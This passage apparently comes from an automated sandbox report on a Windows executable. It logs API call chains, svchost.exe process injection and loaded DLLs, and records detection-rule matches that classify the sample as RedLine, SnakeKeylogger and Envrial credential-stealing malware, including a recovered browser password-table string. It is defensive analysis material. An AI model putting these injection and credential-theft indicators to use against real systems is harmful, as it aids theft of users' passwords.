              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_090793582_2_09079358
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0907EF802_2_0907EF80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0907EF902_2_0907EF90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0907179F2_2_0907179F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09078BB12_2_09078BB1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09078BC02_2_09078BC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0907F3D72_2_0907F3D7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0907F3E82_2_0907F3E8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0907DE1F2_2_0907DE1F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0907DE302_2_0907DE30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0907E27A2_2_0907E27A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09071E8A2_2_09071E8A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0907E2882_2_0907E288
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0907E6D02_2_0907E6D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0907E6E02_2_0907E6E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0040E1D8 appears 44 times
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: String function: 004115D7 appears 36 times
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: String function: 00416C70 appears 39 times
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: String function: 00445AE0 appears 55 times
              Source: 9L83v5j083.exe, 00000000.00000003.2058894003.0000000003FA3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 9L83v5j083.exe
              Source: 9L83v5j083.exe, 00000000.00000003.2059506231.000000000414D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 9L83v5j083.exe
              Source: 9L83v5j083.exe, 00000000.00000002.2063454139.0000000003E40000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs 9L83v5j083.exe
              Source: 9L83v5j083.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 0.2.9L83v5j083.exe.3e40000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 2.2.svchost.exe.7d00000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.svchost.exe.7d00000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.svchost.exe.7d00000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 2.2.svchost.exe.7910f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.svchost.exe.7910f20.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.svchost.exe.7910f20.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 2.3.svchost.exe.326f000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.svchost.exe.7910000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.svchost.exe.7910000.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.svchost.exe.7910000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 2.3.svchost.exe.326f000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.3.svchost.exe.326f000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 2.3.svchost.exe.326ff20.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.3.svchost.exe.326ff20.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.3.svchost.exe.326ff20.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 2.3.svchost.exe.326ff20.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.3.svchost.exe.326ff20.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.3.svchost.exe.326ff20.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 2.2.svchost.exe.7d00000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.svchost.exe.7d00000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.svchost.exe.7d00000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 2.3.svchost.exe.326f000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.3.svchost.exe.326f000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.3.svchost.exe.326f000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 2.2.svchost.exe.7910000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.svchost.exe.7910000.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.svchost.exe.7910000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 2.2.svchost.exe.7910f20.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.svchost.exe.7910f20.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.svchost.exe.7910f20.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000002.00000002.4526377595.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000000.00000002.2063454139.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000002.00000002.4525593506.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000002.00000002.4529908255.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000002.00000002.4529908255.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000002.00000002.4529908255.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: Process Memory Space: svchost.exe PID: 428, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@4/3
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
              Source: C:\Windows\SysWOW64\svchost.exeMutant created: NULL
              Source: C:\Users\user\Desktop\9L83v5j083.exeFile created: C:\Users\user\AppData\Local\Temp\autD1EB.tmpJump to behavior
              Source: 9L83v5j083.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\9L83v5j083.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\9L83v5j083.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: svchost.exe, 00000002.00000003.2258586844.0000000006488000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526971369.0000000005621000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526971369.0000000005615000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526971369.00000000055F0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526971369.00000000055E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: 9L83v5j083.exeVirustotal: Detection: 70%
              Source: 9L83v5j083.exeReversingLabs: Detection: 68%
              Source: C:\Users\user\Desktop\9L83v5j083.exeFile read: C:\Users\user\Desktop\9L83v5j083.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\9L83v5j083.exe "C:\Users\user\Desktop\9L83v5j083.exe"
              Source: C:\Users\user\Desktop\9L83v5j083.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\9L83v5j083.exe"
              Source: C:\Users\user\Desktop\9L83v5j083.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\9L83v5j083.exe"Jump to behavior
              Source: C:\Users\user\Desktop\9L83v5j083.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\9L83v5j083.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\9L83v5j083.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\9L83v5j083.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\9L83v5j083.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\9L83v5j083.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\9L83v5j083.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\9L83v5j083.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\9L83v5j083.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\9L83v5j083.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\9L83v5j083.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
